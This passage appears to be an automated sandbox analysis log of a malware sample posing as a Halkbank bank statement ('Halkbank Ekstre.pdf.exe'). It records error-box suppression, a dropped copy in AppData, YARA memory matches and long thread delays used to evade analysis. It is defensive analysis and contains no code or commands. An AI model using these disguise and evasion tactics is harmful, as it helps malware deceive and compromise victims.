                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 2876, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 87F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 6BF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 97F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: A7F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: AF70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: BF70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: CF70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 17B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 3370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: 5370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 1200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 8B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 74A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 9B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: AB50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: B2A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: C2A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: D2A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 17D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 3220000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory allocated: 5220000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599670Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599451Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598989Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598749Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598421Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598311Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598201Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596992Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596337Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596184Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595999Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595671Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595343Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594905Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594468Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594249Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594140Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594031Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593921Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593812Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593703Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593593Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599874
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599765
